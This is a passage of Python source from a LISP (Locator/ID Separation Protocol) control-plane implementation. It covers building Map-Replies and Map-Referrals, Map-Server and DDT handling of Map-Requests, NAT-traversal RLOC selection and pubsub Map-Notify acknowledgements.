    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        addr_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
            None)
    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
    else:
        lprint("Invalid LISP control packet type {}".format(header.type))
    #endif
    return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl):
    """
    Dispatch a Map-Request that has the RLOC-probe bit set to the ETR
    or RTR handler. Other node types ignore probes.
    """
    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
    elif (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
    else:
        lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(
            probe))
    #endif
    return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
    """
    Handle a Solicit-Map-Request based Map-Request; currently it is
    only logged.
    """
    lprint("Received SMR-based Map-Request")
    return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
    """
    Handle an SMR-invoked Map-Request; currently it is only logged.
    """
    lprint("Received SMR-invoked Map-Request")
    return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
    keys, enc, auth, mr_ttl=-1):

    #
    # Encode the Map-Reply header first, then one EID-record.
    #
    reply = lisp_map_reply()
    reply.rloc_probe = rloc_probe
    reply.echo_nonce_capable = enc
    reply.hop_count = mr_ttl if (mr_ttl != -1) else 0
    reply.record_count = 1
    reply.nonce = nonce
    packet = reply.encode()
    reply.print_map_reply()

    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group
    packet += eid_record.encode()
    eid_record.print_record(" ", False)

    #
    # Append one RLOC-record per locator. Locators that are addresses of
    # this system are flagged local and carry probe/key state; an RTR
    # advertises its priority-254 locator under the name "RTR".
    #
    our_addresses = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
    for locator in rloc_set:
        rloc_record = lisp_rloc_record()
        if (locator.rloc.print_address_no_iid() in our_addresses):
            rloc_record.local_bit = True
            rloc_record.probe_bit = rloc_probe
            rloc_record.keys = keys
            if (lisp_i_am_rtr and locator.priority == 254):
                rloc_record.rloc_name = "RTR"
            #endif
        #endif
        rloc_record.store_rloc_entry(locator)
        rloc_record.reach_bit = True
        rloc_record.print_record(" ")
        packet += rloc_record.encode()
    #endfor
    return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):

    #
    # Encode the Map-Referral header, one EID-record to follow.
    #
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    #
    # With no delegation entry, echo the requested EID/group back; otherwise
    # report the delegation's prefix and count the referral.
    #
    eid_record = lisp_eid_record()
    rloc_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        rloc_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1
    #endif
    eid_record.rloc_count = rloc_count
    eid_record.authoritative = True

    #
    # Use action passed into this function. But if NULL, select the action
    # based on the first ddt-node child type.
    #
    ddt_node = ddt_entry.delegation_set[0] if (rloc_count != 0) else None
    if (action == LISP_DDT_ACTION_NULL):
        if (ddt_node == None):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            if (ddt_node.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL
            #endif
            if (ddt_node.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL
            #endif
        #endif
    #endif

    #
    # Conditions when the incomplete bit should be set in the Map-Referral.
    # Bug fix: the old code dereferenced 'ddt_node' here even when no
    # delegation-set existed (e.g. an MS_ACK with ddt_entry == None from
    # lisp_ddt_process_map_request), raising NameError. A missing ddt-node
    # is now treated as "not an ms-peer".
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        is_ms_peer = (ddt_node != None and ddt_node.is_ms_peer())
        incomplete = (lisp_i_am_ms and is_ms_peer == False)
    #endif

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl
    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    #
    # Append one RLOC-record per ddt-node in the delegation-set.
    #
    if (rloc_count == 0): return(packet)
    for ddt_node in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ddt_node.delegate_address
        rloc_record.priority = ddt_node.priority
        rloc_record.weight = ddt_node.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record(" ")
    #endfor
    return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl):
    """
    ETR processing of a received Map-Request (typically an RLOC-probe).

    lisp_sockets: sockets used to send the reply. map_request: parsed
    Map-Request. source: outer source address of the request. sport:
    source UDP port to reply to. ttl: value passed through to the
    Map-Reply as mr_ttl.

    Replies only for EIDs found in our database-mappings; otherwise the
    request is logged and dropped.
    """
    # Unicast lookup on target-eid; for (S,G) look up group then source.
    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)
    #endif
    eid_str = map_request.print_prefix()
    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}". \
            format(green(eid_str, False)))
        return
    #endif
    prefix_str = db.print_eid_tuple()
    lprint("Found database-mapping EID-prefix {} for requested EID {}". \
        format(green(prefix_str, False), green(eid_str, False)))
    #
    # Get ITR-RLOC to return Map-Reply to.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source
    #endif
    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys
    db.map_replies_sent += 1
    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
    #
    # If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
    # If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
    # we are an ETR not behind a NAT, we want to return the RLOC-probe
    # Map-Reply to the swapped control ports.
    #
    # We could be getting a RLOC-probe from an xTR that is behind the same
    # NAT as us. So do not data encapsulate the RLOC-probe reply.
    #
    # There is a special hack here. If the sport is 0, this RLOC-probe
    # request is coming from an RTR. If we are doing gleaning on the RTR,
    # this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
    # list will not be set because a gleaned xTR does not have NAT-traversal
    # enabled.
    #
    # NOTE(review): len(lisp_sockets) == 4 presumably distinguishes the
    # full xTR socket set -- confirm against the callers.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        rtr = itr_rloc.print_address_no_iid()
        if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return
        #endif
    #endif
    #
    # Send to lisp-core process to send packet from UDP port 4342.
    #
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl):

    #
    # Reply to the first listed ITR-RLOC; for a private address (NATed
    # requester) use the outer source address instead.
    #
    reply_dest = map_request.itr_rlocs[0]
    if (reply_dest.is_private_address()): reply_dest = source

    #
    # Advertise this RTR's own locators (v4 and v6 when present) at
    # priority 254.
    #
    rtr_rloc_set = []
    for local_rloc in lisp_myrlocs[0:2]:
        if (local_rloc == None): continue
        entry = lisp_rloc()
        entry.rloc.copy_address(local_rloc)
        entry.priority = 254
        rtr_rloc_set.append(entry)
    #endfor

    packet = lisp_build_map_reply(map_request.target_eid,
        map_request.target_group, rtr_rloc_set, map_request.nonce,
        LISP_NO_ACTION, 1440, True, map_request.keys, lisp_nonce_echoing,
        True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, reply_dest, sport)
    return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
    """
    Return the RLOC-set to advertise for 'target_site_eid' to a requester
    whose source-EID is 'seid' (with group 'group'). If both sites sit
    behind the same NAT (same first global RLOC) or share a nonzero
    site-id, return copies of only the private RLOCs so the xTRs talk
    directly instead of hair-pinning through the NAT. Otherwise return
    the registered RLOC-set unchanged.
    """
    rloc_set = target_site_eid.registered_rlocs
    source_site_eid = lisp_site_eid_lookup(seid, group, False)
    if (source_site_eid == None): return(rloc_set)
    #
    # Get global RLOC address from target site.
    #
    target_rloc = None
    new_set = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            # Collect deep copies of private RLOCs; these are what gets
            # returned when the NATed/same-site checks below succeed.
            new_rloc = copy.deepcopy(rloc_entry)
            new_set.append(new_rloc)
            continue
        #endif
        target_rloc = rloc_entry
        break
    #endfor
    if (target_rloc == None): return(rloc_set)
    target_rloc = target_rloc.rloc.print_address_no_iid()
    #
    # Get global RLOC address from source site.
    #
    source_rloc = None
    for rloc_entry in source_site_eid.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_rloc = rloc_entry
        break
    #endfor
    if (source_rloc == None): return(rloc_set)
    source_rloc = source_rloc.rloc.print_address_no_iid()
    #
    # If the xTRs are behind the same NAT, then we return private addresses.
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_rloc == target_rloc):
            lprint("Return private RLOCs for sites behind {}".format( \
                target_rloc))
            return(new_set)
        #endif
        return(rloc_set)
    #endif
    #
    # If the xTRs are not behind the same NAT, but are configured in the
    # same site-id, they can reach each other with private addresses. So
    # return them in the RLOC-set.
    #
    if (site_id == source_site_eid.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(site_id))
        return(new_set)
    #endif
    return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    """
    Return the subset of 'registered_rloc_set' appropriate for requester
    'mr_source'. Priority-254 entries are NAT-traversal RTR locators: when
    the requester is one of those RTRs, return the non-RTR locators; when
    it is an ITR/PITR, return the private locators plus the RTR list. A
    set with no priority-254 entries (site not behind a NAT) is returned
    unchanged. 'multicast' selects filtering on mpriority vs priority.
    """
    rtr_list = []
    rloc_set = []
    #
    # Search the RTR list to see if the Map-Requestor is an RTR. If so,
    # return the RLOC-set to the RTR so it can replicate directly to ETRs.
    # Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
    #
    rtr_is_requestor = False
    behind_nat = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        behind_nat |= True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        rtr_is_requestor = True
        break
    #endfor
    #
    # If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
    # a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
    # public space.
    #
    if (behind_nat == False): return(registered_rloc_set)
    #
    # An RTR can be behind a NAT when deployed in a cloud infrastructure.
    # When the MS is in the same cloud infrastructure, the source address
    # of the Map-Request (ECM) is not translated. So we are forced to put
    # the private address in the rtr-list the MS advertises. But we should
    # not return the private address in any Map-Replies. We use the private
    # address in the rtr-list for the sole purpose to identify the RTR so
    # we can return the RLOC-set of the ETRs.
    #
    ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
    #
    # Create two small lists. A list of RTRs which are unicast priority of
    # 254 and a rloc-set which are records that are not priority 254.
    #
    for rloc_entry in registered_rloc_set:
        if (ignore_private and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)
        #endif
    #endfor
    #
    # The RTR is sending the Map-Request.
    #
    if (rtr_is_requestor): return(rloc_set)
    #
    # An ITR is sending the Map-Request.
    #
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly the private RLOC. If it is not reachable, the ITR can encap
    # to the RTR. The ITR will cache a subset of the RLOC-set in this entry
    # (so it can check the global RLOC first and not encap to itself).
    #
    rloc_set = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
    #endfor
    rloc_set += rtr_list
    return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):

    #
    # Record the subscriber so a future RLOC-set change for reply_eid
    # triggers a Map-Notify back to this ITR RLOC and port.
    #
    subscriber = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
    subscriber.add(reply_eid)
    return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):

    #
    # Extract the record-count and nonce from the Map-Reply header, then
    # strip the 12-byte header off the record body.
    #
    count = socket.ntohl(struct.unpack("I", packet[0:4])[0]) & 0xff
    nonce = packet[4:12]
    body = packet[12::]

    #
    # Prepend a Map-Notify header: type/record-count word, the original
    # nonce, and a zeroed Key-ID/Alg-ID/Authentication-Length word.
    #
    type_word = struct.pack("I", socket.htonl((LISP_MAP_NOTIFY << 28) | count))
    zero_auth = struct.pack("I", 0)
    return(type_word + nonce + zero_auth + body)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):

    #
    # Nothing to do unless someone has subscribed to this EID-prefix.
    #
    eid_str = eid.print_prefix()
    if (eid_str not in lisp_pubsub_cache): return

    #
    # Send a Map-Notify to each subscriber and count it against the
    # subscription.
    #
    for subscriber in lisp_pubsub_cache[eid_str].values():
        itr_str = red(subscriber.itr.print_address_no_iid(), False)
        lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
            bold("subscriber", False), itr_str, subscriber.port,
            "0x" + lisp_hex_string(subscriber.xtr_id),
            green(eid_str, False), "0x" + lisp_hex_string(subscriber.nonce)))

        lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1,
            subscriber.itr, subscriber.port, subscriber.nonce, 0, 0, 0,
            site, False)
        subscriber.map_notify_count += 1
    #endfor
    return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
    ttl, xtr_id):

    #
    # Record the subscription first, so later RLOC-set changes notify it.
    #
    lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)

    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(
        bold("Map-Notify", False), green(reply_eid.print_prefix(), False),
        red(itr_rloc.print_address_no_iid(), False),
        "0x" + lisp_hex_string(xtr_id)))

    #
    # Rewrite the already-built Map-Reply as a Map-Notify and send it as
    # the subscription ack.
    #
    notify = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, notify, itr_rloc, port)
    return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):
    """
    Map-Server processing of a Map-Request.

    Looks the target EID up in the site cache and either (1) proxy-replies
    on behalf of the registered site, (2) forwards the Map-Request inside
    an ECM to one of the site's registered ETRs, or (3) sends a negative
    Map-Reply. Verifies Map-Request signatures for crypto-EIDs or when the
    site requires them, applies site policy when proxy-replying, and acks
    pubsub subscribe-requests with a Map-Notify.

    Returns [eid, group, LISP_DDT_ACTION_*] so the caller can build a
    Map-Referral when this Map-Server participates in a DDT hierarchy.
    """
    #
    # Look up EID in site cache. If we find it and it has registered for
    # proxy-replying, this map-server will send the Map-Reply. Otherwise,
    # send to one of the ETRs at the registered site.
    #
    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    itr_rloc = map_request.itr_rlocs[0]
    xtr_id = map_request.xtr_id
    nonce = map_request.nonce
    action = LISP_NO_ACTION
    pubsub = map_request.subscribe_bit

    #
    # Check if we are verifying Map-Request signatures. If so, do a mapping
    # database lookup on the source-EID to get public-key.
    #
    sig_good = True
    is_crypto_hash = (lisp_get_eid_hash(eid) != None)
    if (is_crypto_hash):
        sig = map_request.map_request_signature
        if (sig == None):
            sig_good = False
            lprint(("EID-crypto-hash signature verification {}, " + \
                "no signature found").format(bold("failed", False)))
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
                    format(sig_eid.print_address(), hash_eid.print_address()))
            #endif
            pf = bold("passed", False) if sig_good else bold("failed", False)
            lprint("EID-crypto-hash signature verification {}".format(pf))
        #endif
    #endif
    if (pubsub and sig_good == False):
        pubsub = False
        lprint("Suppress creating pubsub state due to signature failure")
    #endif

    #
    # There are two cases here that need attention. If the Map-Request was
    # an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
    # to return the Map-Reply in IPv4. And if the Map-Request came to us
    # through a NAT, sending the Map-Reply to the Map-Request port won't
    # get translated by the NAT. So we have to return the Map-Reply to the
    # ECM port. Hopefully, the RTR is listening on the ECM port and using
    # the Map-Request port as the ECM port as well. This is typically only
    # a problem on the RTR, when behind a NAT. For an ITR, it usually
    # doesn't send Map-Requests since NAT-traversal logic installs default
    # map-cache entries.
    #
    reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source

    site_eid = lisp_site_eid_lookup(eid, group, False)
    if (site_eid == None or site_eid.is_star_g()):
        notfound = bold("Site not found", False)
        lprint("{} for requested EID {}".format(notfound,
            green(eid_str, False)))

        #
        # Send negative Map-Reply with TTL 15 minutes.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
            mr_sport, 15, xtr_id, pubsub)
        return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
    #endif

    prefix_str = site_eid.print_eid_tuple()
    site_name = site_eid.site.site_name

    #
    # If we are requesting for non Crypto-EIDs and signatures are configured
    # to be required and no signature is in the Map-Request, bail.
    #
    if (is_crypto_hash == False and site_eid.require_signature):
        sig = map_request.map_request_signature
        sig_eid = map_request.signature_eid
        if (sig == None or sig_eid.is_null()):
            lprint("Signature required for site {}".format(site_name))
            sig_good = False
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
                    format(sig_eid.print_address(), hash_eid.print_address()))
            #endif
            pf = bold("passed", False) if sig_good else bold("failed", False)
            lprint("Required signature verification {}".format(pf))
        #endif
    #endif

    #
    # Check if site-eid is registered.
    #
    if (sig_good and site_eid.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
            format(site_name, green(prefix_str, False), green(eid_str, False)))

        #
        # We do not want to return a coarser EID-prefix to the Map-Resolver.
        # The AMS site entry may be one.
        #
        if (site_eid.accept_more_specifics == False):
            eid = site_eid.eid
            group = site_eid.group
        #endif

        #
        # Send forced-TTLs even for native-forward entries.
        #
        ttl = 1
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000
        #endif

        #
        # Send negative Map-Reply with TTL 1 minute.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
            mr_sport, ttl, xtr_id, pubsub)
        return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
    #endif

    #
    # Should we proxy-reply?
    #
    nat = False
    pr_str = ""
    check_policy = False
    if (site_eid.force_nat_proxy_reply):
        pr_str = ", nat-forced"
        nat = True
        check_policy = True
    elif (site_eid.force_proxy_reply):
        pr_str = ", forced"
        check_policy = True
    elif (site_eid.proxy_reply_requested):
        pr_str = ", requested"
        check_policy = True
    elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
        pr_str = ", drop-to-pitr"
        action = LISP_DROP_ACTION
    elif (site_eid.proxy_reply_action != ""):
        action = site_eid.proxy_reply_action
        pr_str = ", forced, action {}".format(action)
        action = LISP_DROP_ACTION if (action == "drop") else \
            LISP_NATIVE_FORWARD_ACTION
    #endif

    #
    # Apply policy to determine if we send a negative map-reply with action
    # "policy-denied" or we send a map-reply with the policy set parameters.
    #
    policy_drop = False
    policy = None
    if (check_policy and lisp_policies.has_key(site_eid.policy)):
        p = lisp_policies[site_eid.policy]
        if (p.match_policy_map_request(map_request, mr_source)): policy = p

        if (policy):
            ps = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
                p.policy_name, p.set_action))
        else:
            ps = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(ps,
                p.policy_name))
            policy_drop = True
        #endif
    #endif

    if (pr_str != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
            format(green(eid_str, False), site_name, green(prefix_str, False),
            pr_str))

        rloc_set = site_eid.registered_rlocs
        ttl = 1440
        if (nat):
            if (site_eid.site_id != 0):
                seid = map_request.source_eid
                rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
            #endif
            if (rloc_set == site_eid.registered_rlocs):
                m = (site_eid.group.is_null() == False)
                new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
                if (new_set != rloc_set):
                    ttl = 15
                    rloc_set = new_set
                #endif
            #endif
        #endif

        #
        # Force TTL if configured. To denote seconds in TTL field of EID-record
        # set high-order bit in ttl value.
        #
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000
        #endif

        #
        # Does policy say what the ttl should be? And if we should drop the
        # Map-Request and return a negative Map-Reply
        #
        if (policy):
            if (policy.set_record_ttl):
                ttl = policy.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(ttl))
            #endif
            if (policy.set_action == "drop"):
                lprint("Policy set-action drop, send negative Map-Reply")
                action = LISP_POLICY_DENIED_ACTION
                rloc_set = []
            else:
                rloc = policy.set_policy_map_reply()
                if (rloc): rloc_set = [rloc]
            #endif
        #endif

        if (policy_drop):
            lprint("Implied drop action, send negative Map-Reply")
            action = LISP_POLICY_DENIED_ACTION
            rloc_set = []
        #endif

        enc = site_eid.echo_nonce_capable

        #
        # Don't tell spoofer any prefix information about the target EID.
        #
        if (sig_good):
            reply_eid = site_eid.eid
            reply_group = site_eid.group
        else:
            reply_eid = eid
            reply_group = group
            action = LISP_AUTH_FAILURE_ACTION
            rloc_set = []
        #endif

        #
        # If this Map-Request is also a subscription request, return same
        # information in a Map-Notify.
        #
        packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
            nonce, action, ttl, False, None, enc, False)

        if (pubsub):
            lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
                mr_sport, nonce, ttl, xtr_id)
        else:
            lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
        #endif

        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
    #endif

    #
    # If there are no registered RLOCs, return.
    #
    rloc_count = len(site_eid.registered_rlocs)
    if (rloc_count == 0):

        #
        # Bug fix: parenthesize the string concatenation so .format()
        # applies to the whole message. Previously it bound only to the
        # second literal and the {} placeholders were printed verbatim.
        #
        lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
            "no registered RLOCs").format(green(eid_str, False), site_name,
            green(prefix_str, False)))
        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
    #endif

    #
    # Forward to ETR at registered site. We have to put in an ECM. Hash
    # on source-EID (or target-EID when no source) to pick one ETR.
    #
    hash_address = map_request.target_eid if map_request.source_eid.is_null() \
        else map_request.source_eid
    hashval = map_request.target_eid.hash_address(hash_address)
    hashval %= rloc_count
    etr = site_eid.registered_rlocs[hashval]

    if (etr.rloc.is_null()):
        lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
            "EID-prefix {}, no RLOC address").format(green(eid_str, False),
            site_name, green(prefix_str, False)))
    else:
        lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
            "EID-prefix {}").format(green(eid_str, False),
            red(etr.rloc.print_address(), False), site_name,
            green(prefix_str, False)))

        #
        # Send ECM.
        #
        lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
            map_request.target_eid, etr.rloc, to_etr=True)
    #endif
    return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
    """
    DDT-node processing of a Map-Request relayed by a Map-Resolver.
    Chooses the referral action and record TTL: a Map-Server answers from
    its site cache (MS-ACK when registered, MS-NOT-REG otherwise with a
    computed negative prefix); a pure DDT node consults the ddt-cache
    (delegation found, delegation hole under an auth-prefix, or not
    authoritative). Sends the Map-Referral back to 'ecm_source'.
    """
    #
    # Lookup target EID address in DDT cache.
    #
    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    nonce = map_request.nonce
    action = LISP_DDT_ACTION_NULL
    #
    # First check to see if EID is registered locally if we are a Map-Server.
    # Otherwise, do DDT lookup.
    #
    ddt_entry = None
    if (lisp_i_am_ms):
        site_eid = lisp_site_eid_lookup(eid, group, False)
        if (site_eid == None): return
        if (site_eid.registered):
            action = LISP_DDT_ACTION_MS_ACK
            ttl = 1440
        else:
            eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
            action = LISP_DDT_ACTION_MS_NOT_REG
            ttl = 1
        #endif
    else:
        ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
        if (ddt_entry == None):
            action = LISP_DDT_ACTION_NOT_AUTH
            ttl = 0
            lprint("DDT delegation entry not found for EID {}".format( \
                green(eid_str, False)))
        elif (ddt_entry.is_auth_prefix()):
            #
            # Check auth-prefix. That means there are no referrals.
            #
            action = LISP_DDT_ACTION_DELEGATION_HOLE
            ttl = 15
            ddt_entry_str = ddt_entry.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " + \
                "found for EID {}").format(ddt_entry_str,
                green(eid_str, False)))
            # Compute the widest hole around the EID (and source for (S,G))
            # that covers no delegation.
            if (group.is_null()):
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    lisp_ddt_cache)
            else:
                group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
                    lisp_ddt_cache)
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    ddt_entry.source_cache)
            #endif
            ddt_entry = None
        else:
            ddt_entry_str = ddt_entry.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format( \
                ddt_entry_str, green(eid_str, False)))
            ttl = 1440
        #endif
    #endif
    #
    # Build and return a Map-Referral message to the source of the Map-Request.
    #
    packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
    # NOTE(review): 0xdfdf0e1d in the nonce high-order bits appears to be an
    # internal marker that keeps the reply on the received port; all other
    # nonzero nonces force the control port -- confirm against the sender.
    nonce = map_request.nonce >> 32
